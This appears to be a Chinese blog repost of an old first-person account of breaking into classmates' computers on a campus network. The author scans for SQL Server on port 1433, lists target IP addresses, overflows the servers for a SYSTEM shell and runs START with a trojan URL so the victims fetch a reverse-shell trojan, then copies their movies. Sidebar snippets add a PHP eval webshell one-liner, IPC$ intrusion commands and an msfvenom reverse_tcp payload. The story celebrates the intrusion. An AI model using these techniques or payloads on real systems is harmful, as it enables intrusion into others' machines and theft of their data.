利用START命令入侵

利用SQL Server漏洞获取资源
最新推荐文章于 2025-09-12 18:45:12 发布
转载 最新推荐文章于 2025-09-12 18:45:12 发布 · 84 阅读 · 0 ·
CC 4.0 BY-SA版权
原文链接:https://yq.aliyun.com/articles/455458
文章标签:

#操作系统

来源:[url]http://www.heibai.net[/url]

  最近,毕业设计也做完了,闲的无聊!每天都是跟同学在一起斗地主,但是斗久了就无聊啊。看片吧,租了几个后,感觉不和算,每次看一个片都得花好几块钱,从别人的电脑里面拷吧!但是现在啊,大家的安全意识都高了,都装了防火墙,(比如:天网,瑞星),更可恨的是现在最新的瑞星病毒防火墙,对每次的溢出攻击都提示,类似“来自:XX。XX。XX。XX的MS04011的攻击”的语句,不仅进不去别人的机器,还被人骂啊,555555555。学校还分了多个VPN,还把135.136.137138。139,445端口都屏蔽了,防止大家互相共享东西,郁闷! 
怎么办呢 ?好象大家毕业设计都用SQL2K做的服务器,一般学校的这个网速,补丁是肯定下不了的,大家都没有打,我记得我进学校的一个服务器都是这么进去的,我想大家应该也不会打啊! 
拿起superscan4.0扫了下1433的,呵呵强哈,一会就出来N多个保存下来随便看下哈: 
* + 202.207.86.186 
|___1433Microsoft-SQL-Server 
* + 202.207.87.182 
|___1433Microsoft-SQL-Server 
* + 202.207.91.117 
|___1433Microsoft-SQL-Server 
* + 202.207.92.117 
|___1433Microsoft-SQL-Server 
* + 202.207.93.153 
|___1433Microsoft-SQL-Server 
* + 202.207.93.236 
|___1433Microsoft-SQL-Server 
* + 202.207.93.242 
|___1433Microsoft-SQL-Server 
呵呵,虽然不是很多,不过有几个就可以了,我不求别的只求能有几个片就可以了! 
  拿起SQL工具,溢出,得到CMD的SYSTEM权限,但是我要这个权限没有用啊。我又进不去拷贝不了电影啊!在CMD下面看到不少好片名,郁闷!我想起用TFTP传送一个木马过去,但是不成功!·估计是防火墙不允许! 
  我在自己的机器开了IIS服务,把FTP也开了,登陆不了FTP。看来这个方法是不行了啊! 
   那就怎么办呢?看到片名,看不到内容,郁闷得很啊! 
   突然看到网上有一个遥控下载者,这个代码我到是看过,我突然灵机一动,哈哈,我自己做一个内部的网页,里面加个反弹木马不就可以了!只要他访问,就OK拉! 
   关键的问题是怎么让他访问这个网页啊!这点最郁闷啊!,我在CMD下虽然拥有SYSTEM权限但是,我却不可以上网啊!郁闷啊! 
  突然想了下,我自己到SYSTEM,SYSTEM32,WINNT目录下去看看,究竟有多少DOS命令可以用啊。!最后我发现了这个命令:START命令,估计大家都用的少!我把他的HLP贴出来给大家看看!: 
启动另一个窗口运行指定的程序或命令。 
START ["title"] [/Dpath] [/I] [/MIN] [/MAX] [/SEPARATE | /SHARED] 
 [/LOW | /NORMAL | /HIGH | /REALTIME | /ABOVENORMAL | /BELOWNORMAL] 
 [/WAIT] [/B] [command/program] 
 [parameters] 
 "title" 在窗口标题栏中显示的标题。 
 path起始目录 
 B 在不创建新窗口的情况下开始应用程序。 除非 
 启动 ^C 处理,否则该应用程序会忽略 ^C 处理; 
^Break 是唯一可以中断该应用程序的方式 
 I 新环境是传递给 cmd.exe 的原始环境, 
 而不是当前环境 
 MIN 开始时窗口最小化 
 MAX 开始时窗口最大化 
 SEPARATE在分开的空间内开始 16 位 Windows 程序 
 SHARED在分共享的空间内开始 16 位 Windows 程序 
 LOW 在 IDLE 优先级类别开始应用程序 
 NORMAL在 NORMAL 优先级类别开始应用程序 
 HIGH在 HIGH 优先级类别开始应用程序 
 REALTIME在 REALTIME 优先级类别开始应用程序 
 ABOVENORMAL 在 ABOVENORMAL 优先级类别开始应用程序 
 BELOWNORMAL 在 BELOWNORMAL 优先级类别开始应用程序 
 WAIT启动应用程序并等候它结束 
 command/program 
 如果是内部 cmd 命令或批文件,那么该命令处理器是 
 用 /K 命令选项运行 cmd.exe 的。这表示该窗口在命令运行 
 后仍然存在。 
 如果不是内部 cmd 命令或批文件,则是一个程序,并 
 作为窗口应用程序或控制台应用程序运行。 
 parameters这些为传送到命令/程序的参数 

如果命令扩展名被启用,通过命令行或 START 命令的外部命令 
调用会如下改变: 
将文件名作为命令键入,非可执行文件可以通过文件关联调用。 
 (例如, WORD.DOC 会调用跟 .DOC 文件扩展名关联的应用程序)。 
 关于如何从命令脚本内部创建这些关联,请参阅 ASSOC 和 
FTYPE 命令。 
执行的应用程序是 32-位 GUI 应用程序时,CMD.EXE 不等应用 
 程序终止就返回命令提示。如果在命令脚本内执行,该新行为 
 则不会发生。 
如果执行的命令行的第一个符号是不带扩展名或路径修饰符的 
 字符串 "CMD","CMD" 会被COMSPEC 变量的数值所替换。这 
 防止从当前目录抓出 CMD.EXE。 
如果执行的命令行的第一个符号没有扩展名,CMD.EXE 会使用 
 PATHEXT 环境变量的数值来决定要以什么顺序寻找哪些扩展 
 名。PATHEXT 变量的默认值是: 
 .COM;.EXE;.BAT;.CMD 
 请注意,该语法跟 PATH 变量的一样,分号隔开不同的元素。 
查找可执行文件时,如果没有相配的扩展名,看一看该名称是否 
与目录名相配。如果确实如此,START 会在那个路径上调用 
Explorer。如果从命令行执行,则等同于对那个路径作 CD /D。 

  我直接在CMD下面打"START HTTP://muma"我木马得地址就可以了! 

   拿起我自己熟悉的木马看着熟悉的木马界面,把一部部MOVIE,COPY过来,过瘾啊!省了不少钱啊!









本文转自loveme2351CTO博客,原文链接: http://blog.51cto.com/loveme23/8536,如需转载请自行联系原作者










命令执行漏洞
banliyaoguai的博客
07-01 1077
曾经有一次渗透,我用dirmap扫描了他网站的一个根目录,发现了他有一个源码的打包,我拿下来以后,我发现他对正则表达式写了一个pre_replace的值,正好符合这个回调后门,然后实施了入侵。这就增加(改变)了一个很好的“执行代码”的方法assert,这个函数可以有一个参数,也可以有两个参数。是 PHP 中的一个内置函数,用于使用指定的回调函数过滤数组中的元素。下列代码就是一个无回显的一个调用,但是由于是没有回显的所以,我们可以用来进行一些命令执行的代码,比如说创建一个文件什么的。的内部数组进行排序。
Windows 远程控制(经典IPC$入侵、psexec类工具、利用WMI远程入侵、PsRemoting远程命令执行、使用wmic命令远程执行)
LKmnbZ's Blog
01-14 7487
一、经典IPC$入侵 利用ipc$和默认共享入侵远程电脑的过程 1. C:\>net use \\127.0.0.1\IPC$ "密码" /user:"用户名" 一般通过扫描弱口令来得到管理员帐号和密码 2. C:\> copy srv.exe \\127.0.0.1\admin$ 先复制srv.exe上去(这里的$是指admin用户的c:\winnt\system32...
利用linux命令进行入侵检测,入侵检测之syscall监控
weixin_28868927的博客
05-13 1187
《Linux入侵检测》系列文章目录:0x01:Syscall简介内核提供用户空间程序与内核空间进行交互的一套标准接口,这些接口让用户态程序能受限访问硬件设备,比如申请系统资源,操作设备读写,创建新进程等。用户空间发生请求,内核空间负责执行,这些接口便是用户空间和内核空间共同识别的桥梁,这里提到两个字“受限”,是由于为了保证内核稳定性,而不能让用户空间程序随意更改系统,必须是内核对外开放的且满足权限...
入侵Linux服务器常用命令
跟派大星学编程
02-28 1502
写个php一句话后门上去: $ echo -e "<?php @eval($_POST[md5])?>" >rankuplog_time.php ​$ cat rankuplog_time.php 1.linux的想着先跨站。 shell浏览目标站不行,命令行下输入 ls -la /www.users/ 2.溢出提权 # python –c ‘impotr pty;pty.s...
net use命令和经典入侵模式
simcor的博客
03-14 3672
转载地址: http://blog.youkuaiyun.com/hitlermen/article/details/4139009 net use命令详解 2008-01-26 02:12 1)建立空连接: net use //IP/ipc$ "" /user:"" (一定要注意:这一行命令中包含了3个空格) 2)建立非空连接: net use //IP/ipc
黑客常用 Linux 入侵常用命令-
jackjack博客
09-21 6016
黑客常用 Linux 入侵常用命令 2018年02月10日 10:49:33 坦GA 阅读数:2675 标签: 黑客常用 Linux 入侵常用命令 更多 个人分类: Linux初级/Linux高级/系统运维 安全技术/黑客技术 原文地址:http://blog.youkuaiyun.com/jHstGeWWubw/article/details/78941387 写个php一句话后门上去: [jobcru...
黑客常用 Linux 入侵常用命令
热门推荐
杨春建的博客
02-10 1万+
原文地址:http://blog.youkuaiyun.com/jHstGeWWubw/article/details/78941387写个php一句话后门上去:[jobcruit@wa64-054 rankup_log]$ echo -e "<?php @eval(\$_POST[md5])?>" >rankuplog_time.php[jobcruit@wa64-054 rankup_l...
一些简单的局域网入侵命令
u013444147的博客
07-09 2792
(与远程主机建立空管连接) net use \\IP地址\ipc$ " " /use:" " (以管理员身份登录远程主机) net use \\IP地址\ipc$ " 密码" /use:" Administrator" (传送文件到远程主机WINNT目录下)copy 本机目录路径\程序 \\IP地址\admin$ (查看远程主机时间) net time \\IP地址 ...
渗透 Linux 入侵常用命令
Butterfly0011的博客
02-17 1817
渗透 Linux 入侵常用命令 写个php一句话后门上去: [jobcruit@wa64-054 rankup_log]$ echo -e “<?php @eval(\$_POST[md5])?>” >rankuplog_time.php [jobcruit@wa64-054 rankup_log]$ cat rankuplog_time.php 1、linux的想着先跨站 sh...
利用msf入侵电脑
X丶 的博客
08-28 7804
需要的工具 msfvenom、msfconsole 执行命令: msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;本地IP&gt; LPORT=&lt;本地端口&gt;  -f exe -o hacker.exe   参数: -p payloads -f 输出格式 -o 输入地址 -e 编码方式(msfvenom -...
入侵常用命令
sangbody的专栏
03-31 508
一,ping       它是用来检查网络是否通畅或者网络连接速度的命令。作为一个生活在网络上的管理员或者黑客来说,ping命令是第一个必须掌握的DOS命令,它所利用的原理是这样的:网络上的机器都有唯一确定的IP地址,我们给目标IP地址发送一个数据包,对方就要返回一个同样大小的数据包,根据返回的数据包我们可以确定目标主机的存在,可以初步判断目标主机的操作系统等。下面就来看看它的一些常用的操作
linux 入侵常用命令汇编
09-16
Linux 入侵常用命令汇编 本资源汇编了 Linux 入侵中常用的命令,掌握这些命令可以帮助配置 Linux 的安全。以下是详细的知识点: 一、查看系统信息 * `cat /etc/passwd` 查看 Linux 用户信息 * `cat /etc/shadow` ...
DOS 入侵命令合集
11-21
标题和描述中的“DOS 入侵命令合集”指的是在DOS环境下,一系列可用于...然而,若被恶意利用,则可能成为攻击者实施网络攻击的手段,因此掌握这些命令的同时,也应提高网络安全意识,确保命令使用的正当性和安全性。
Windows 入侵痕迹清理.pdf
07-05
- **Cipher命令**:利用Cipher命令的`/W`参数对已删除文件的硬盘空间进行数据覆盖,以确保数据无法被恢复。 - **Format命令**:格式化磁盘时加上`/P`参数,可以对每个扇区进行多次清零和随机数覆盖。 #### 4. 清除...
性能测试工具JvisualVM/jconsole使用
平时的经验总结,学习历程
09-12 208
port是jmx的另一个通信端口。可以不设置,启动后系统会自动随机指定端口。如果关闭了防火墙,没有网络访问策略,可以不设置。如果服务器需要开通端口访问策略此处需要配置开通策略的端口。然后在windows客户机,安装jdk目录下的bin目录下找到jvisualvm.exe或jconsole,通过远程连接方式监控jvm的cpu 内存 线程 类加载的情况。com.sun.management.jmxremote.port 是客户端连接的端口。主要介绍远程使用方式,在启动参数添加如下参数。
Linux权限
Wangshijie1015的博客
09-10 738
所以就出现了所属者这个角色,有了所属者之后,如果李四说他想看这个文件,那你就将李四添加为该文件的所属者,并赋予所属者所需的权限,这样除了拥有者和所属者有所需权限,经由李四分享给其他人后,他们都是other,没有所需权限就无法对文件进行所需操作了。原因就是在Centos下,文件在确定用户角色的时候,确认的顺序是按拥有者,所属者,other这个顺序进行确认的,这里确定了wsj是拥有者的角色,那其权限就是---,一旦角色确认下来后,权限也就确定下来了,不会因为权限被拒绝后再去确认用户是不是其他角色。
打印机已联网,但打印机显示“未连接”,解决方案
qq_40230540的博客
09-08 506
在弹出来的窗口中,选择 “Standard TCP/IP Port”,然后点击 “新端口” (New Port…在 “打印机名或IP地址” 栏中,输入您刚才从打印机配置页上找到的IP地址(例如192.168.1.105)。找到您的打印机图标,右键点击它,选择 “打印机属性” (注意不是单纯的“属性”)。打印机已联网,电脑未正确指向打印机的IP地址,也会显示“未连接”,查看方式改为“大图标”或“小图标”,找到并点击 “设备和打印机”。如果无法重启,可以先选择 “停止”,等待几秒后,再选择 “启动”。
设计模式(C++)详解—抽象工厂模式 (Abstract Factory)(2)
最新发布
weixin_42108533的博客
09-12 603
抽象工厂模式详解 抽象工厂模式是一种创建型设计模式,用于创建一系列相关或依赖对象的家族。它解决了在不指定具体类的情况下创建相互关联的产品对象的问题。 核心特点: 提供"工厂的工厂"概念,能创建整套相互关联的产品 确保创建的产品能协同工作(如苹果生态设备) 客户端代码只依赖抽象接口,与具体实现解耦 适用场景: 跨平台UI组件开发 数据库访问层 游戏开发中的不同风格角色/道具 主题系统切换 优势: 产品兼容性保证 易于切换整套产品族 符合开闭原则(新增产品族无需修改代码) 扩展性特点: 纵向
Linux笔记---进程间关系与守护进程
2302_80372340的博客
09-09 1226
操作系统中,是由,用于简化对多个关联进程的统一管理。它是 Unix/Linux 系统中进程组织的重要概念,主要为了方便信号传递、作业控制等操作。每个进程组由唯一的 进程组 ID(PGID) 标识。通常,进程组的创建者(称为 “组长进程”)的进程 ID(PID)会作为该进程组的 PGID(即 PGID = 组长进程的PID)。什么是有关联的进程呢?有父子关系的进程、通过管道相连的进程……这些在操作系统层面上有关联,需要相互协作的进程就叫有关联的进程。
Linux入侵技术详解:常用命令与安全防护
"这份PDF文件主要涵盖了Linux系统中的一些常用入侵命令,包括查看系统信息、网络配置、进程状态以及服务管理等,同时也提到了利用`su`进行权限提升的技巧。" 在Linux环境中,了解这些命令对于系统管理和安全审计至...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值